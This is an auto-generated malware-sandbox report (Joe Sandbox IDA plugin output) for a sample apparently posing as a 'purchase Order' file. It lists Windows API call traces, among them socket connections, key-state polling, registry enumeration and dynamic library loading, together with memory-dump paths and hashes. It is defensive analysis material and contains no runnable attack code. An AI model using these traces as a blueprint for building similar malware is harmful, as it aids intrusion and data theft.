                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C89683
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C89694
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C896CE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: a9904313a590503d6261b6a6a99c315f662a000ff9f8a61f69d370418fd52cbc
                                                        • Instruction ID: d5af84fbf9486f2be2fff480886d5d7b652121377538f0d576937ddba12c0a15
                                                        • Opcode Fuzzy Hash: a9904313a590503d6261b6a6a99c315f662a000ff9f8a61f69d370418fd52cbc
                                                        • Instruction Fuzzy Hash: 78215171500205ABDB60AF69DC45FAEB7A8EF85738F280A19F8B1D72D0E7709D41CB58
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C8DB0A
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C8DB5E
                                                        • __swprintf.LIBCMT ref: 00C8DB77
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CDDC00), ref: 00C8DBB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: c55ea4c71809de25f241d1319c27dbe402f1d1062c7db7b88672efd5ac14adb0
                                                        • Instruction ID: 35567640f7bd0ad06f93234d4e297c781a2a3b722de1610eb7417e188b8d8d5b
                                                        • Opcode Fuzzy Hash: c55ea4c71809de25f241d1319c27dbe402f1d1062c7db7b88672efd5ac14adb0
                                                        • Instruction Fuzzy Hash: D8218335A00108AFCB10EFA5C985EAEBBB8EF49704B054069F509D7261DB70EE41DB61
                                                        APIs
                                                          • Part of subcall function 00C7C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C7C84A
                                                          • Part of subcall function 00C7C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7C85D
                                                          • Part of subcall function 00C7C82D: GetCurrentThreadId.KERNEL32 ref: 00C7C864
                                                          • Part of subcall function 00C7C82D: AttachThreadInput.USER32(00000000), ref: 00C7C86B
                                                        • GetFocus.USER32 ref: 00C7CA05
                                                          • Part of subcall function 00C7C876: GetParent.USER32(?), ref: 00C7C884
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C7CA4E
                                                        • EnumChildWindows.USER32(?,00C7CAC4), ref: 00C7CA76
                                                        • __swprintf.LIBCMT ref: 00C7CA90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                        • String ID: %s%d
                                                        • API String ID: 3187004680-1110647743
                                                        • Opcode ID: e80f1725448d7dcaca506f4eaf4a7f1b2aec65248dc8dd358fb58375cfe23616
                                                        • Instruction ID: 9a991c9d0a1c856f6efaba7b9190ab3108d481771456686e31e5813f28f084e9
                                                        • Opcode Fuzzy Hash: e80f1725448d7dcaca506f4eaf4a7f1b2aec65248dc8dd358fb58375cfe23616
                                                        • Instruction Fuzzy Hash: 3F117F7160020A6BCB11BFA09CC5FA93768AF55714F04C07AFE1DAA186DB709A46EB71
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
                                                        • GetStockObject.GDI32(00000011), ref: 00C5D1CE
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID: @U=u
                                                        • API String ID: 3970641297-2594219639
                                                        • Opcode ID: 884f30a9f8258e91801019064db50520adf3fe93573c7485f4b70fda4330bb73
                                                        • Instruction ID: d4ad757cd18010a17937574720d51c071e836549d7d3d7182aa84fa80de595a0
                                                        • Opcode Fuzzy Hash: 884f30a9f8258e91801019064db50520adf3fe93573c7485f4b70fda4330bb73
                                                        • Instruction Fuzzy Hash: DC118B72101A0ABFEB228F90DC50FEFBB69FF08365F040115FE1692150C7319DA0ABA0
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CA19F3
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CA1A26
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CA1B49
                                                        • CloseHandle.KERNEL32(?), ref: 00CA1BBF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 182246d42a3832ea2ac363ea56f00d6872bce64901d974cc854cc92427f9432e
                                                        • Instruction ID: 47e03266a173fcb8857030734846049e8a24f9fdb50d51496184b57f85427e07
                                                        • Opcode Fuzzy Hash: 182246d42a3832ea2ac363ea56f00d6872bce64901d974cc854cc92427f9432e
                                                        • Instruction Fuzzy Hash: 6781A4B4600201ABDF109F64C886BAEBBE5EF09724F088459FD15AF3C2D7B4AD41DB94
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00C81CB4
                                                        • VariantClear.OLEAUT32(00000013), ref: 00C81D26
                                                        • VariantClear.OLEAUT32(00000000), ref: 00C81D81
                                                        • VariantClear.OLEAUT32(?), ref: 00C81DF8
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C81E26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType
                                                        • String ID:
                                                        • API String ID: 4136290138-0
                                                        • Opcode ID: 160b341236dd276a634d3c0cd8e187765f8aeb950765db534494b40fd8df60ae
                                                        • Instruction ID: a2163beb4010660dd46b9e74b63ed073891bc4db9def5bada820d70480deaf5b
                                                        • Opcode Fuzzy Hash: 160b341236dd276a634d3c0cd8e187765f8aeb950765db534494b40fd8df60ae
                                                        • Instruction Fuzzy Hash: 8B512AB5A00209AFDB14DF58C884EAAB7F8FF4C314B15855AED59DB301D730EA52CBA4
                                                        APIs
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CA06EE
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00CA077D
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CA079B
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00CA07E1
                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00CA07FB
                                                          • Part of subcall function 00C5E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00C8A574,?,?,00000000,00000008), ref: 00C5E675
                                                          • Part of subcall function 00C5E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00C8A574,?,?,00000000,00000008), ref: 00C5E699
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 5dd16ff4cc2c826b32240654f45c45bba74f8cc62efef84687f5ebce851d06eb
                                                        • Instruction ID: 6eeed51f125cbb2d13a4dbec32aff398bfc826a4d724e8b362fbb49a011ed150
                                                        • Opcode Fuzzy Hash: 5dd16ff4cc2c826b32240654f45c45bba74f8cc62efef84687f5ebce851d06eb
                                                        • Instruction Fuzzy Hash: F2514B75A0020ADFCB10EFA8C481EADB7B5FF49354B148059F916AB362DB30EE45DB94
                                                        APIs
                                                          • Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA2EEF
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CA2F2E
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CA2F75
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00CA2FA1
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CA2FAE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                        • String ID:
                                                        • API String ID: 3740051246-0
                                                        • Opcode ID: 2d6de037e8c9b6281e53cd0909059d298bf54e149b985a41b78cfcf610684a72
                                                        • Instruction ID: 9d6a12059e635b9bda051ceaeade0316a30a4abbd7361563dfe2ab876dbd3b7c
                                                        • Opcode Fuzzy Hash: 2d6de037e8c9b6281e53cd0909059d298bf54e149b985a41b78cfcf610684a72
                                                        • Instruction Fuzzy Hash: 6F513971208205AFD704EB98CC91E6AB7F9FF89318F00892DF596972A1DB30E904DB52
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C912B4
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C912DD
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C9131C
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C91341
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C91349
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 1344c9b7bd2c31a7c4d47103125e104ee57e09e263ce7f3befc30ba3e36e9851
                                                        • Instruction ID: b506c5d2c124d7e51904efbe9e8e8928fa2fe0815ba5d64cc6b692be98339fc7
                                                        • Opcode Fuzzy Hash: 1344c9b7bd2c31a7c4d47103125e104ee57e09e263ce7f3befc30ba3e36e9851
                                                        • Instruction Fuzzy Hash: B5412D35A00505DFDF01EF64C985AAEBBF5FF09714B148099E90AAB362CB31ED41DB51
                                                        APIs
                                                        • GetCursorPos.USER32(000000FF), ref: 00C5B64F
                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00C5B66C
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00C5B691
                                                        • GetAsyncKeyState.USER32(00000002), ref: 00C5B69F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 9717c626e289e3715d9249ca76b7a306560915fef6f9271d0fc31b7d4c5ba7e0
                                                        • Instruction ID: 70456b616f0bebeabab6912796750133b2924ab040d9981b3a113d45e12d1dd2
                                                        • Opcode Fuzzy Hash: 9717c626e289e3715d9249ca76b7a306560915fef6f9271d0fc31b7d4c5ba7e0
                                                        • Instruction Fuzzy Hash: 48417F39508115FFCF199F65C844AEDBBB4FB05325F204319F82A96290DB30AE98EF91
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00C7B369
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00C7B413
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C7B41B
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00C7B429
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C7B431
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 3add4b450398e524cc41a677022075f5aafd9186f82a74c0e9d7d39bb0017a03
                                                        • Instruction ID: 12ac1ce2511c9bbc6b636e6016b5c2a380aac0aeef55666dfcfaac2cfa534827
                                                        • Opcode Fuzzy Hash: 3add4b450398e524cc41a677022075f5aafd9186f82a74c0e9d7d39bb0017a03
                                                        • Instruction Fuzzy Hash: 6331AE71900219EFDF04CF68D94DB9E7BB5EB04319F118229F929AA2E1C7B09E54DB90
                                                        APIs
                                                          • Part of subcall function 00C450E6: _wcsncpy.LIBCMT ref: 00C450FA
                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00C860C3), ref: 00C86369
                                                        • GetLastError.KERNEL32(?,?,?,00C860C3), ref: 00C86374
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C860C3), ref: 00C86388
                                                        • _wcsrchr.LIBCMT ref: 00C863AA
                                                          • Part of subcall function 00C86318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C860C3), ref: 00C863E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                        • String ID:
                                                        • API String ID: 3633006590-0
                                                        • Opcode ID: 3acd456a25abe628c21073122a9c4da8fcaa403bf84d352ecfdc0a9402c22f63
                                                        • Instruction ID: 3fd4beded376c6c731a3634fc6b5881c588c1cd53999d9310f15789dc9508159
                                                        • Opcode Fuzzy Hash: 3acd456a25abe628c21073122a9c4da8fcaa403bf84d352ecfdc0a9402c22f63
                                                        • Instruction Fuzzy Hash: 2821D5315042159BDB25BB78AC46FEE33ACEF06364F100479F456D30E1EB60EA85AB59
                                                        APIs
                                                          • Part of subcall function 00C9A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C9A84E
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C98BD3
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C98BE2
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00C98BFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 3701255441-0
                                                        • Opcode ID: 2f580f658e85235a83ee29ebb9a59a94339f4627fd7c06e3c45781b35da4a6bb
                                                        • Instruction ID: 10e2f8934ddf53de7bc1ec6001108fc0e4e81cb85b402a373687656fb101ebe9
                                                        • Opcode Fuzzy Hash: 2f580f658e85235a83ee29ebb9a59a94339f4627fd7c06e3c45781b35da4a6bb
                                                        • Instruction Fuzzy Hash: 0821CA322002149FDB10AF68CC89F7E77A9EF49760F048459FA57AB3D2CB74AD058B65
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00C98441
                                                        • GetForegroundWindow.USER32 ref: 00C98458
                                                        • GetDC.USER32(00000000), ref: 00C98494
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00C984A0
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00C984DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 37d3329ce9bf2a2a0d55c648593bc6b9d6bcb18e78cae7b68c72c78087eb782c
                                                        • Instruction ID: d91256dbc6b6f78075e53993f1467e78f015cfe8e8088b0174dc7978d694b19b
                                                        • Opcode Fuzzy Hash: 37d3329ce9bf2a2a0d55c648593bc6b9d6bcb18e78cae7b68c72c78087eb782c
                                                        • Instruction Fuzzy Hash: AB218E75A00204AFDB10EFA4C889BAEBBE5EF49301F048879F85AD7251DB70ED45DB60
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C5AFE3
                                                        • SelectObject.GDI32(?,00000000), ref: 00C5AFF2
                                                        • BeginPath.GDI32(?), ref: 00C5B009
                                                        • SelectObject.GDI32(?,00000000), ref: 00C5B033
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 94363e03704f78c08f6b9c13803139f49e347fba36ce254e293981dec5b13581
                                                        • Instruction ID: f99be8cdf619e1bd8b5102bfe1bb26c076b2c71ecd1556384704729fa474eb6f
                                                        • Opcode Fuzzy Hash: 94363e03704f78c08f6b9c13803139f49e347fba36ce254e293981dec5b13581
                                                        • Instruction Fuzzy Hash: 342186B8800305EFDB10DF56EC44B9E7BA8BB50366F54432AF829D22E0C3715985DF65
                                                        APIs
                                                        • __calloc_crt.LIBCMT ref: 00C621A9
                                                        • CreateThread.KERNEL32(?,?,00C622DF,00000000,?,?), ref: 00C621ED
                                                        • GetLastError.KERNEL32 ref: 00C621F7
                                                        • _free.LIBCMT ref: 00C62200
                                                        • __dosmaperr.LIBCMT ref: 00C6220B
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
